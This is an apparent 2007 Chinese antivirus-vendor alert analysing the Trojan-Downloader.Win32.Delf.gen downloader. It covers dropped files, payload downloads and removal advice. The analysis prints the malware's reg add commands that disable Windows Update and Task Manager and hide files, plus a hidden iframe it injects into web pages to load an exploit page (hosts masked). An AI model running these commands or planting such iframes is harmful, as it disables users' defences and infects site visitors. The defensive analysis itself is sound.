不支持Flash

安全警报:Trojan-Downloader.Win32.Delf.gen

http://www.sina.com.cn 2007年11月23日 17:10  太平洋电脑网
作者:超级巡警

  超级巡警团队监测到恶意程序Trojan-Downloader.Win32.Delf.gen变种发布速度很快,并且针对大多数反病毒软件进行了相应的处理,以逃避被查杀。该程序不仅会在网页文件中插入恶意框架代码,通过多种系统或应用程序漏洞传播木马,还会释放利用系统自动运行功能的autorun.inf文件及相应文件。

  一、病毒相关分析:

  病毒标签:

  病毒名称:Trojan-Downloader.Win32.Delf.gen

  病毒类型:木马下载者

  危害级别:3

  感染平台:Windows

  病毒大小:34,424(字节)

  SHA1  :0801dacd6a579ec5f0ed5d97e7f336b59ea2fbb9

  加壳类型:未知

  开发工具:Delphi

  病毒行为:

  1、程序运行后,释放文件:

  %System%\Systom.exe

  %System%\auToRun.inf

  并在磁盘各个分区释放文件sos.exe和auToRun.inf

  2、执行以下命令,修改注册表:

  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WindowsUpdate" /v

  DisableWindowsUpdateAccess /t REG_dword /d 00000001 /f //禁用系统自动升级

  reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v

  DisableTaskMgr /t REG_dword /d 00000001 /f       //禁用任务管理器

  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\EXPlorer\Advanced" /v Hidden /t

  reg_dWord /d 00000000 /f //隐藏文件

  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt

  /t reg_dword /d 00000001 /f //隐藏扩展名

  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden

  /t reg_dword /d 00000000 /f //隐藏文件

  reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL"

  /v CheckedValue /t REG_SZ /d 0 /f //隐藏文件

  reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN"

  /v CheckedValue /t REG_dword /d 00000002 /f //隐藏文件

  3、下载文件:

  http://*****/1.txt

  http://*****/2.txt

  http://*****/3.txt

  其中1.txt内容为:

  http://*****/mh.exe

  http://*****/ok.exe

  http://*****/Server.exe

  http://*****/uc.exe

  http://*****/t/servere.exe

  下载以上文件并重命名为?svchs0t.exe复制到系统目录%System%下 //?为从0开始数字

  其中2.txt内容为:

  360安全卫士

  卡巴

  瑞星

  麦咖啡

  NOD32

  木马

  防火墙

  专杀工具

  4、监控并关闭含有“病毒、木马、检测、wpe”等字符的窗体

  5、在磁盘中所有网页文件尾部插入框架代码链接网马地址:

  <IfrAmE src=http://*****/index.htm width=50 height=0></IfrAmE>

  index.htm文件内容与网马利用漏洞如下图:

安全警报:Trojan-Downloader.Win32.Delf.gen

  二、解决方案

  推荐方案:

  1、安装超级巡警进行全面病毒查杀。超级巡警用户请升级到最新病毒库,并进行全盘扫描。

  2、升级系统及应用程序到最新版本。

  3、选择超级巡警“工具”中“智能扫描”功能中的“清除指定代码”,进行全盘扫描并清除插入网页文件中的框架

  代码。

  超级巡警下载地址:http://www.dswlab.com/d1.html

  三、安全建议

  1、立即安装或更新防病毒软件并对内存和硬盘全面扫描(推荐安装超级巡警)。

  2、根据实际安全级别需要适当考虑选用防火墙,并进行正确的设置。

  3、使用超级巡警的补丁检查功能,及时安装系统补丁。

  4、禁用或删除不必要的的帐号,对管理员帐号设置一个强壮的密码。

  5、禁用不必要的服务。

  6、及时更新常用软件,尤其是聊天工具。

  7、不要随意下载不安全网站的文件并运行。

  8、下载和新拷贝的文件要首先进行查毒。

  9、不要轻易打开即时通讯工具中发来的链接或可执行文件。

  10、使用移动存储介质进行数据访问时,先对其进行病毒检查,建议使用超级巡警U盘免疫器进行免疫。

  注: %System% 是一个可变路径,在windows95/98/me中该变量是指%Windir%\System,在WindowsNT/2000/XP/2003/VISTA中该变

  量指%Windir%\System32。其它:

  %SystemDrive%       系统安装的磁盘分区

  %SystemRoot% = %Windir%   WINDODWS系统目录

  %ProgramFiles%        应用程序默认安装目录

  %AppData%       应用程序数据目录

  %CommonProgramFiles%   公用文件目录

  %HomePath%       当前活动用户目录

  %Temp% =%Tmp%       当前活动用户临时目录

  %DriveLetter%       逻辑驱动器分区

  %HomeDrive%        当前用户系统所在分区

爱问(iAsk.com)
不支持Flash
·《对话城市》直播中国 ·城市发现之旅有奖活动 ·企业邮箱换新颜 ·邮箱大奖等你拿
不支持Flash
不支持Flash